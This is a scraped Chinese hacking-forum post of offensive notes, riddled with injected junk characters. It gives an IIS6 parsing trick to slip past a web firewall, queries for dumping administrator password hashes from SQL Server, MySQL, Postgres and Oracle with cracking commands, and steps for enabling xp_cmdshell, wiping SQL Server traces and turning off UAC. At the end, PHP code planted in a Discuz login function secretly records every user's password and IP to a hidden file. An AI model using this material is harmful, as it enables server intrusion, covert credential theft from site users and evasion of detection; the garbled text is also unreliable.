$ g& |2 D8 e0 H1 ]+ E# y( m9 e在它下面直接插入即可,记录的密码生成在pwd.txt中,
" W x9 |+ w I: P! L+ N其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录
2 b- B/ A2 g- u) F利用II6文件解析漏洞绕过安全狗代码:
+ k/ S% V( v P Q2 g4 j; G! @;antian365.asp;antian365.jpg1 V D$ [ ^7 \ v4 {0 A- }3 ]
+ ^, ? d: F/ `& m: W
各种类型数据库抓HASH破解最高权限密码!" x/ A0 T+ r2 G8 a
1.sql server2000
9 H6 [* q' G7 Z# I! g+ P' D6 `SELECT password from master.dbo.sysxlogins where name='sa'+ Z2 ], H# P" n+ k
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED2503418 n5 Q- I3 T8 E7 P9 y
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A
; ^; A0 J; d* }: f B+ L
( Y V) W5 F7 c; G+ s- J/ e! U0×0100- constant header
& U& N: N8 [+ V1 z$ W34767D5C- salt6 {5 X# D; | D, o$ J/ @) J6 M
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash: b/ n4 G* Z+ j) V( M% O
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash) y* Z' E: Y0 b A$ c% ], f3 R/ p1 E
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash0 ~: z# N @& X5 v
SQL server 2005:-
$ G9 R/ T, I; K3 q+ a& ]! hSELECT password_hash FROM sys.sql_logins where name='sa'
2 a$ @, _( L/ J& b! R0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F7 U# G8 j. i9 B3 }: W0 f/ A
0×0100- constant header
$ `1 [( b. ], h* Q# [ s {. {* f2 }993BF231-salt
" U: u" y1 M1 I: g! |( U5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
! G4 V7 `$ r6 } |- W/ b/ W: rcrack case sensitive hash in cain, try brute force and dictionary based attacks.
5 O0 D+ D5 }) w5 T/ Y& H) z3 x2 f4 B/ A$ [7 n8 B5 R' `1 _
update:- following bernardo’s comments:-: f- L8 }. k0 @& @9 R
use function fn_varbintohexstr() to cast password in a hex string.# _# ?- b0 y! V0 A& n
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins
' Q {3 \4 p2 r2 R. Y: C! [' i6 N, u! B+ B) n5 C7 L
MYSQL:-- F' b: Y. n8 m1 l6 X, F0 z- s
" I9 _5 i) ^ V2 v7 }7 `4 ?
In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.+ {. d6 Y/ h6 g( m& U/ C& f
5 _3 {3 t6 P* o9 ]/ w" O9 E*mysql < 4.1
0 d& l; t4 D0 y# V/ h# f6 S8 g# }+ [4 o
mysql> SELECT PASSWORD(‘mypass’);0 W6 K, l' M8 N1 p/ z4 x. S
+——————–+
$ f4 c8 N* q2 R" x9 s% w- M$ v; `| PASSWORD(‘mypass’) |
* S3 O, W' f0 E3 I: @+——————–+2 `0 g, a$ h, v. ]4 ~/ o7 l6 a3 {
| 6f8c114b58f2ce9e |
2 y) J1 s" V4 v% K1 O0 Q+——————–+: X9 \) [* L3 F' R6 s
- }3 K& O9 p' u$ @! ?6 u% H- g5 C# E*mysql >=4.1* T( T5 Z0 F% K/ Z$ c
) L* }4 K4 D) i9 ^+ Amysql> SELECT PASSWORD(‘mypass’);% R4 g( z5 @+ O! ?6 Q
+——————————————-+
2 t1 l) M) B" R- W( w* a* M| PASSWORD(‘mypass’) |
$ E0 j4 ^4 e( S5 [4 Y3 e. V3 H6 l) O+——————————————-+4 T7 a! t2 G+ P8 N @
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |& `; ?. K- D! P$ v: }
+——————————————-+
7 O% Y" E4 Z) E$ @; ^/ U7 Z1 o1 k0 g2 h) O1 s
Select user, password from mysql.user. c, ?% W( a& F
The hashes can be cracked in ‘cain and abel’
" Y# O& K) x& Q7 K8 ~5 [ R
( S% _: P! \- M( X: C8 wPostgres:-
; Y% `- j* \1 [4 t; H& G3 N' {' `1 PPostgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)* z! B% m6 s' k0 ]2 s. e
select usename, passwd from pg_shadow;
, A& @' k& `& W1 h- }4 O3 E7 d1 ]usename | passwd
3 y; N/ P- \6 O3 ~. w' }" L——————+————————————-0 O4 h2 T0 ]' {% x+ u9 n" @
testuser | md5fabb6d7172aadfda4753bf0507ed4396
& j3 G5 e% K$ C8 X( Q( A- P# @use mdcrack to crack these hashes:-4 k8 S! i6 N/ O$ y5 L2 w
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396
" K1 @3 ^* j% C' o1 }1 E r* v/ ]3 g3 q1 [1 V
Oracle:-
" ~1 D' X$ C! K" ]select name, password, spare4 from sys.user$% K d0 Q0 ?9 h6 k
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g9 A* v$ ~ D: Y" c4 a. F" @
More on Oracle later, i am a bit bored…., S: O3 z, Z( U# y* [5 @* Z
6 N. ?# X% y7 m% \7 f: E
. C0 P. ^, O! f
在sql server2005/2008中开启xp_cmdshell
) R: ^" h: q$ ^7 L: e1 C-- To allow advanced options to be changed.' N3 w& k* o$ l# p: T! I
EXEC sp_configure 'show advanced options', 1
! `2 z, P& s" m% HGO2 z! p5 N$ m' e5 K" W0 }. n9 s
-- To update the currently configured value for advanced options.. w. N: \7 S1 q7 {- c
RECONFIGURE
' ]# X- z$ ~( c* zGO! x& I9 N! N: ]! J" p5 c$ M# A5 }( ^
-- To enable the feature.$ b7 J2 }. Y/ a5 x5 g! J
EXEC sp_configure 'xp_cmdshell', 1& x- A( A+ m M
GO2 C9 \: k$ A2 ] q3 U
-- To update the currently configured value for this feature.
/ ~- g: o$ c/ IRECONFIGURE
; r5 P- b ?0 y1 lGO: B: |' V# }6 }( q+ m9 R3 W0 g
SQL 2008 server日志清除,在清楚前一定要备份。
$ I* f# z; `% s$ m- P5 @1 {如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:
& U+ D& {- z' o6 J5 E( p) `& wX:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin
$ g" U7 r$ S9 j3 n1 T! A; l5 ^) w
3 I' }& _$ N6 B/ w$ c T9 K- |对于SQL Server 2008以前的版本:
/ h( d x5 n8 ]% `SQL Server 2005:
% K. x" r1 j o. T' g4 l删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat/ k$ l' v& \2 s _/ b) ?
SQL Server 2000:* E3 i. F- q/ E8 b" u) g7 D/ w
清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。3 L2 C' S* P2 p2 x8 c: J5 e
) h. n" ]& H6 k$ L1 W7 K f4 |
本帖最后由 simeon 于 2013-1-3 09:51 编辑
8 q& z, @. H7 c% ]) x9 o" d6 l2 j% n% u1 J# I6 I- P( O
1 i2 S: J1 Y$ A8 S" s! F
windows 2008 文件权限修改
Q$ W! w4 e& n9 f# {: h* R1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
1 n/ _+ X8 F, z# x2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
' Z+ w. [: ?% l一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,
' T+ V, H9 `, {2 B" {( S8 r4 r7 D5 o
Windows Registry Editor Version 5.00: n B& q$ I5 p" F" O; x7 ]
[HKEY_CLASSES_ROOT\*\shell\runas]
+ K- L3 r; L ? @@="管理员取得所有权"
S. ^2 m- c1 j+ _% d"NoWorkingDirectory"=""
% G+ m8 _. z2 K' b- o[HKEY_CLASSES_ROOT\*\shell\runas\command]1 \4 T; M& ~. ]- c& n. ?* r* v) G* j
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"0 J, k/ n) h( w' S7 [9 j5 _
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"+ Q+ }% s- |, F6 M; v& d8 b4 n3 a" ?
[HKEY_CLASSES_ROOT\exefile\shell\runas2]( u0 c8 b/ _' r+ v5 g; ~
@="管理员取得所有权"
) ]+ o& l3 [- u4 b0 {"NoWorkingDirectory"=""* M6 r: U/ a; k+ t
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
3 ]; s/ t( w5 ^" y, p: ~, A@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F", T' [8 `5 B8 v* |
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"/ S1 {, G4 w3 A" N" R% }& U
9 L- K; s y3 |- N
[HKEY_CLASSES_ROOT\Directory\shell\runas]. w) D( z2 k9 C; t& t8 I6 ~ s! r
@="管理员取得所有权"% V g$ I% L6 a& ?( ^$ a" \8 f& Y
"NoWorkingDirectory"=""3 Z9 f! B8 ?& m$ x# T' [
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]; }% A% R8 m, W+ \+ b
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
$ ?3 @3 L- Y% j3 E" `! A J1 l"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"- l$ n: N( W6 Z. S \! j) r
3 f" l" |2 _1 b$ t. p# Z" i# r3 |1 y& I ]
win7右键“管理员取得所有权”.reg导入6 \0 b+ o% ^: e4 p+ c/ F
二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,# u& t( [% b" a! F# [' ^
1、C:\Windows这个路径的“notepad.exe”不需要替换& q0 ^$ b3 Z+ r% v+ t2 F
2、C:\Windows\System32这个路径的“notepad.exe”不需要替换
; a6 m; ?/ p3 Y' y; t3、四个“notepad.exe.mui”不要管
B% \1 s) `& y5 ~' A8 f. m4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和7 I5 k; r2 d1 X6 l# a% g8 [: Z
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”
2 B& {6 j0 [7 R8 p, }# J& _$ Q, y替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,4 l S( t; o, a8 w$ }
替换完之后回到桌面,新建一个txt文档打开看看是不是变了。' V' Q2 a3 m" e( ]( Y
windows 2008中关闭安全策略: * i2 n4 h2 s" ~, F
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f- v9 d7 s; D( G5 J0 {
修改uc_client目录下的client.php 在
0 G5 v8 @+ v% n, mfunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
" a7 H; w: a/ q2 c! L! y下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
; j4 J( ^+ N6 H5 p: T) J5 X, f% u你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw7 \! f$ l# n2 m+ K
if(getenv('HTTP_CLIENT_IP')) {7 w1 C, z3 g+ N F+ M1 |1 f! X
$onlineip = getenv('HTTP_CLIENT_IP');
, D$ Y# s0 u! ~ H( Q1 E} elseif(getenv('HTTP_X_FORWARDED_FOR')) { P3 u) g z Q4 u, E' c7 k; z
$onlineip = getenv('HTTP_X_FORWARDED_FOR');
3 U* M( ^" n I# G} elseif(getenv('REMOTE_ADDR')) {( ]+ R! [- e' Q5 G& i1 c8 r# q6 t
$onlineip = getenv('REMOTE_ADDR');
, Q% L& x: {% ^} else {
# j& n+ y6 l9 \# Q# l. Q$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
5 g4 W i+ S8 h9 F0 w}
) q0 r9 G2 M6 b# f $showtime=date("Y-m-d H:i:s");
# z5 V" n$ f: \3 C- b3 p $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
J# J' `, z5 E $handle=fopen('./data/cache/csslog.php','a+');+ H" P4 q1 K% w! H
$write=fwrite($handle,$record); |
发表于 2013-2-27 21:24:42
收藏
支持
反对